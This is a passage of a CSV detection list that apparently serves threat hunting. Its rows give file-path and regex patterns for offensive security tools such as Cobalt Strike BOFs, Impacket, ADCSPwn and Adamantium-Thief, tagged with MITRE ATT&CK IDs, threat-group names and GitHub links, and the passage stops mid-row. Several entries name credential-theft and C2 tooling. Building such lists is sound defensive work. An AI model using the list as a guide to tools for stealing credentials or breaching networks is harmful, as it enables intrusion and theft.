"*/acm_enum_certs_expired_*.json*",".{0,1000}\/acm_enum_certs_expired_.{0,1000}\.json.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","Scattered Spider*","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","#linux","N/A","9","10","4651","731","2025-03-20T21:08:57Z","2018-06-13T21:58:59Z","5121" "*/acm_enum_certs_info_*.json*",".{0,1000}\/acm_enum_certs_info_.{0,1000}\.json.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","Scattered Spider*","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","#linux","N/A","9","10","4651","731","2025-03-20T21:08:57Z","2018-06-13T21:58:59Z","5122" "*/ActiveScanPlusPlus*",".{0,1000}\/ActiveScanPlusPlus.{0,1000}","offensive_tool_keyword","ActiveScanPlusPlus","ActiveScan++ extends Burp Suite's active and passive scanning capabilities. Designed to add minimal network overhead. 
it identifies application behaviour that may be of interest to advanced testers","T1583 - T1595 - T1190","TA0001 - TA0002 - TA0007 - TA0008","N/A","N/A","Discovery","https://github.com/albinowax/ActiveScanPlusPlus","1","1","N/A","network exploitation tool","N/A","7","630","195","2025-04-17T10:47:54Z","2014-06-23T10:04:13Z","5124" "*/AD_Enumeration_Hunt*",".{0,1000}\/AD_Enumeration_Hunt.{0,1000}","offensive_tool_keyword","AD_Enumeration_Hunt","This repository contains a collection of PowerShell scripts and commands that can be used for Active Directory (AD) penetration testing and security assessment","T1018 - T1003 - T1033 - T1087 - T1069 - T1046 - T1069.002 - T1047 - T1083","TA0001 - TA0007 - TA0005 - TA0002 - TA0003","N/A","N/A","Discovery","https://github.com/alperenugurlu/AD_Enumeration_Hunt","1","1","N/A","AD Enumeration","7","1","93","18","2023-08-05T06:10:26Z","2023-08-05T05:16:57Z","5125" "*/AD_Miner.git*",".{0,1000}\/AD_Miner\.git.{0,1000}","offensive_tool_keyword","AD_Miner","AD Miner is an Active Directory audit tool that leverages cypher queries to crunch data from the #Bloodhound graph database to uncover security weaknesses","T1087.002 - T1069 - T1018 - T1595","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/Mazars-Tech/AD_Miner","1","1","N/A","AD Enumeration","7","10","1290","131","2025-03-12T10:53:09Z","2023-09-26T12:36:59Z","5126" "*/ADACLScanner.git*",".{0,1000}\/ADACLScanner\.git.{0,1000}","offensive_tool_keyword","ADACLScanner","A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .","T1222 - T1069 - T1018","TA0002 - TA0007 - TA0043","N/A","N/A","Discovery","https://github.com/canix1/ADACLScanner","1","1","N/A","AD Enumeration","7","10","1015","173","2025-04-11T14:35:08Z","2017-04-06T12:28:37Z","5129" "*/adalanche/modules/*",".{0,1000}\/adalanche\/modules\/.{0,1000}","offensive_tool_keyword","adalanche","Active Directory ACL Visualizer and Explorer - who's 
really Domain Admin?","T1484 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/lkarlslund/Adalanche","1","1","N/A","AD Enumeration","10","10","1908","184","2025-03-25T13:01:45Z","2020-10-07T10:07:22Z","5130" "*/Adamantium-Thief.git*",".{0,1000}\/Adamantium\-Thief\.git.{0,1000}","offensive_tool_keyword","Adamantium-Thief","Decrypt chromium based browsers passwords - cookies - credit cards - history - bookmarks and autofill.","T1555 - T1003","TA0006","N/A","N/A","Credential Access","https://github.com/LimerBoy/Adamantium-Thief","1","1","N/A","N/A","10","9","818","205","2025-01-12T15:11:50Z","2020-03-01T06:50:15Z","5131" "*/ADAPE.ps1*",".{0,1000}\/ADAPE\.ps1.{0,1000}","offensive_tool_keyword","ADAPE-Script","Active Directory Assessment and Privilege Escalation Script","T1178 - T1087 - T1482","TA0002 - TA0004 - TA0007","N/A","Black Basta","Privilege Escalation","https://github.com/cjoan75/ADAPE-Script","1","1","N/A","N/A","8","1","0","0","2020-07-11T00:53:24Z","2020-08-09T16:52:35Z","5132" "*/ADAPE-Script.git*",".{0,1000}\/ADAPE\-Script\.git.{0,1000}","offensive_tool_keyword","ADAPE-Script","Active Directory Assessment and Privilege Escalation Script","T1178 - T1087 - T1482","TA0002 - TA0004 - TA0007","N/A","Black Basta","Privilege Escalation","https://github.com/cjoan75/ADAPE-Script","1","1","N/A","N/A","8","1","0","0","2020-07-11T00:53:24Z","2020-08-09T16:52:35Z","5133" "*/AdapticClient.exe*",".{0,1000}\/AdapticClient\.exe.{0,1000}","offensive_tool_keyword","AdaptixC2","C2- Adaptix is an extensible post-exploitation and adversarial emulation framework made for penetration testers","T1071 - T1105 - T1090 - T1568 - T1204 - T1566 - T1059","TA0011 - TA0010 - TA0008 - TA0002 - TA0001","N/A","N/A","C2","https://github.com/Adaptix-Framework/AdaptixC2","1","1","N/A","N/A","10","10","547","114","2025-04-21T06:03:46Z","2024-08-21T18:07:05Z","5134" "*/adaptiveC2.py*",".{0,1000}\/adaptiveC2\.py.{0,1000}","offensive_tool_keyword","bruteratel","A 
Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","5135" "*/AdaptixC2.git*",".{0,1000}\/AdaptixC2\.git.{0,1000}","offensive_tool_keyword","AdaptixC2","C2- Adaptix is an extensible post-exploitation and adversarial emulation framework made for penetration testers","T1071 - T1105 - T1090 - T1568 - T1204 - T1566 - T1059","TA0011 - TA0010 - TA0008 - TA0002 - TA0001","N/A","N/A","C2","https://github.com/Adaptix-Framework/AdaptixC2","1","1","N/A","N/A","10","10","547","114","2025-04-21T06:03:46Z","2024-08-21T18:07:05Z","5136" "*/adaudit.git*",".{0,1000}\/adaudit\.git.{0,1000}","offensive_tool_keyword","adaudit","Powershell script to do domain auditing automation","T1087 - T1069 - T1046 - T1057 - T1114 - T1018","TA0007 - TA0003 - TA0004 - TA0006","N/A","N/A","Discovery","https://github.com/phillips321/adaudit","1","1","N/A","N/A","5","4","389","106","2025-04-08T06:17:54Z","2018-04-20T11:29:06Z","5137" "*/ADAudit.ps1*",".{0,1000}\/ADAudit\.ps1.{0,1000}","offensive_tool_keyword","adaudit","Powershell script to do domain auditing automation","T1087 - T1069 - T1046 - T1057 - T1114 - T1018","TA0007 - TA0003 - TA0004 - TA0006","N/A","N/A","Discovery","https://github.com/phillips321/adaudit","1","1","N/A","N/A","5","4","389","106","2025-04-08T06:17:54Z","2018-04-20T11:29:06Z","5139" "*/ADcheck.git*",".{0,1000}\/ADcheck\.git.{0,1000}","offensive_tool_keyword","Adcheck","Assess the security of your Active Directory with few or all privileges. 
This tool offers functionalities similar to PingCastle","T1087 - T1012 - T1482 - T1059 - T1203 - T1212 - T1480 - T1552 - T1112 - T1207 - T1483 - T1113 - T1057 - T1136 - T1119 - T1082 - T1553 - T1140 - T1107 - T1078 - T1562","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/CobblePot59/Adcheck","1","1","N/A","N/A","10","4","315","35","2025-04-18T15:17:46Z","2024-05-10T13:54:45Z","5141" "*/ADcheck.py*",".{0,1000}\/ADcheck\.py.{0,1000}","offensive_tool_keyword","Adcheck","Assess the security of your Active Directory with few or all privileges. This tool offers functionalities similar to PingCastle","T1087 - T1012 - T1482 - T1059 - T1203 - T1212 - T1480 - T1552 - T1112 - T1207 - T1483 - T1113 - T1057 - T1136 - T1119 - T1082 - T1553 - T1140 - T1107 - T1078 - T1562","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/CobblePot59/Adcheck","1","1","N/A","N/A","10","4","315","35","2025-04-18T15:17:46Z","2024-05-10T13:54:45Z","5142" "*/ADCollector.exe*",".{0,1000}\/ADCollector\.exe.{0,1000}","offensive_tool_keyword","ADCollector","ADCollector is a lightweight tool that enumerates the Active Directory environment","T1087 - T1018 - T1069 - T1482","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/dev-2null/ADCollector","1","1","N/A","N/A","7","7","629","81","2022-07-30T05:27:15Z","2019-05-15T06:42:20Z","5143" "*/ADCollector.exe*",".{0,1000}\/ADCollector\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","1","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","5144" 
"*/ADCollector.exe*",".{0,1000}\/ADCollector\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","5145" "*/ADCollector.git*",".{0,1000}\/ADCollector\.git.{0,1000}","offensive_tool_keyword","ADCollector","ADCollector is a lightweight tool that enumerates the Active Directory environment","T1087 - T1018 - T1069 - T1482","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/dev-2null/ADCollector","1","1","N/A","N/A","7","7","629","81","2022-07-30T05:27:15Z","2019-05-15T06:42:20Z","5146" "*/adconnectdump.git*",".{0,1000}\/adconnectdump\.git.{0,1000}","offensive_tool_keyword","adconnectdump","Dump Azure AD Connect credentials for Azure AD and Active Directory","T1003.004 - T1059.001 - T1082","TA0006 - TA0002 - TA0007","N/A","N/A","Credential Access","https://github.com/fox-it/adconnectdump","1","1","N/A","N/A","10","7","668","88","2024-11-10T22:00:16Z","2019-04-09T07:41:42Z","5148" "*/ADCS.ps1*",".{0,1000}\/ADCS\.ps1.{0,1000}","offensive_tool_keyword","PoshADCS","attack vectors against Active Directory by abusing Active Directory Certificate Services (ADCS)","T1213.003 - T1213 - T1098.003 - T1098 - T1484.001","TA0002 - TA0003 - 
TA0040","N/A","N/A","Persistence","https://github.com/cfalta/PoshADCS","1","1","N/A","N/A","7","2","186","17","2021-07-07T16:47:07Z","2019-10-15T15:54:03Z","5149" "*/adcs.py*",".{0,1000}\/adcs\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#linux","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","5150" "*/adcs_enum/*",".{0,1000}\/adcs_enum\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - 
Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","N/A","10","10","1389","234","2025-03-26T19:36:31Z","2020-07-15T16:21:18Z","5151" "*/adcs_request/adcs_request.*",".{0,1000}\/adcs_request\/adcs_request\..{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","N/A","10","10","959","147","2025-02-26T21:21:25Z","2022-04-25T16:32:08Z","5152" "*/adcs_request/CertCli.*",".{0,1000}\/adcs_request\/CertCli\..{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","N/A","10","10","959","147","2025-02-26T21:21:25Z","2022-04-25T16:32:08Z","5153" "*/adcs_request/certenroll.*",".{0,1000}\/adcs_request\/certenroll\..{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection 
BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","N/A","10","10","959","147","2025-02-26T21:21:25Z","2022-04-25T16:32:08Z","5154" "*/adcs_request/CertPol.*",".{0,1000}\/adcs_request\/CertPol\..{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - 
T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","N/A","10","10","959","147","2025-02-26T21:21:25Z","2022-04-25T16:32:08Z","5155" "*/ADCSCoercePotato.git*",".{0,1000}\/ADCSCoercePotato\.git.{0,1000}","offensive_tool_keyword","ADCSCoercePotato","coercing machine authentication but specific for ADCS server","T1187","TA0006","N/A","N/A","Credential Access","https://github.com/decoder-it/ADCSCoercePotato","1","1","N/A","N/A","10","3","224","31","2024-05-05T14:42:23Z","2024-02-26T12:08:34Z","5156" "*/ADCSCoercePotato/*",".{0,1000}\/ADCSCoercePotato\/.{0,1000}","offensive_tool_keyword","ADCSCoercePotato","coercing machine authentication but specific for ADCS server","T1187","TA0006","N/A","N/A","Credential Access","https://github.com/decoder-it/ADCSCoercePotato","1","1","N/A","N/A","10","3","224","31","2024-05-05T14:42:23Z","2024-02-26T12:08:34Z","5157" 
"*/adcs-enum.py*",".{0,1000}\/adcs\-enum\.py.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Athena","1","1","N/A","N/A","10","10","198","40","2025-02-12T17:13:10Z","2022-01-24T20:44:38Z","5158" "*/adcshunter.git*",".{0,1000}\/adcshunter\.git.{0,1000}","offensive_tool_keyword","adcshunter","Uses rpcdump to locate the ADCS server and identify if ESC8 is vulnerable from unauthenticated perspective.","T1018 - T1087 - T1046 - T1201 - T1595","TA0007 - TA0043","N/A","N/A","Discovery","https://github.com/danti1988/adcshunter","1","1","N/A","N/A","7","1","80","7","2024-09-13T12:50:50Z","2023-12-14T14:31:05Z","5159" "*/ADCSKiller*",".{0,1000}\/ADCSKiller.{0,1000}","offensive_tool_keyword","ADCSKiller","ADCSKiller is a Python-based tool designed to automate the process of discovering and exploiting Active Directory Certificate Services (ADCS) vulnerabilities. 
It leverages features of Certipy and Coercer to simplify the process of attacking ADCS infrastructure","T1552.004 - T1003.003 - T1114.002 - T1649","TA0006 - TA0003 - TA0005","N/A","N/A","Exploitation tool","https://github.com/grimlockx/ADCSKiller","1","1","N/A","N/A","N/A","8","710","70","2023-05-19T17:36:37Z","2023-05-19T06:51:41Z","5160" "*/ADCSPwn.exe*",".{0,1000}\/ADCSPwn\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","1","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","5161" "*/ADCSPwn.exe*",".{0,1000}\/ADCSPwn\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","5162" "*/ADCSPwn.git*",".{0,1000}\/ADCSPwn\.git.{0,1000}","offensive_tool_keyword","ADCSPwn","A tool to escalate privileges in an active directory network by coercing authenticate from machine accounts and relaying to the certificate service","T1550.002 - T1078.003 - T1110.003 - T1649","TA0004 - TA0006","N/A","N/A","Privilege 
Escalation","https://github.com/bats3c/ADCSPwn","1","1","N/A","N/A","10","9","838","127","2023-03-20T20:30:40Z","2021-07-30T15:04:41Z","5163" "*/adcsync.git*",".{0,1000}\/adcsync\.git.{0,1000}","offensive_tool_keyword","adcsync","Use ESC1 to perform a makeshift DCSync and dump hashes","T1003.006 - T1021","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/JPG0mez/ADCSync","1","1","N/A","N/A","9","3","205","22","2023-11-02T21:41:08Z","2023-10-04T01:56:50Z","5164" "*/adcsync.py*",".{0,1000}\/adcsync\.py.{0,1000}","offensive_tool_keyword","adcsync","Use ESC1 to perform a makeshift DCSync and dump hashes","T1003.006 - T1021","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/JPG0mez/ADCSync","1","1","N/A","N/A","9","3","205","22","2023-11-02T21:41:08Z","2023-10-04T01:56:50Z","5165" "*/add_computer.py*",".{0,1000}\/add_computer\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#linux","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","5166" "*/add_groupmember.py*",".{0,1000}\/add_groupmember\.py.{0,1000}","offensive_tool_keyword","acltoolkit","acltoolkit is an ACL abuse swiss-army knife. 
It implements multiple ACL abuses","T1222.001 - T1222.002 - T1046","TA0007 - TA0040","N/A","N/A","Exploitation tool","https://github.com/zblurx/acltoolkit","1","1","N/A","N/A","N/A","2","120","12","2023-02-03T10:27:45Z","2022-01-12T22:45:49Z","5167" "*/add-admin.exe*",".{0,1000}\/add\-admin\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","5168" "*/addcomputer.py*",".{0,1000}\/addcomputer\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","5169" "*/addcomputer_LDAP_spn.py*",".{0,1000}\/addcomputer_LDAP_spn\.py.{0,1000}","offensive_tool_keyword","Ouned","The OUned project automating Active Directory Organizational Units ACL exploitation through gPLink poisoning","T1484 - T1210","TA0001 - TA0004 - TA0005 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/synacktiv/Ouned","1","1","N/A","N/A","10","2","112","14","2025-03-29T14:20:38Z","2024-04-17T10:18:04Z","5170" "*/addcomputer_with_spns.py*",".{0,1000}\/addcomputer_with_spns\.py.{0,1000}","offensive_tool_keyword","Ouned","The OUned project automating Active Directory Organizational Units ACL 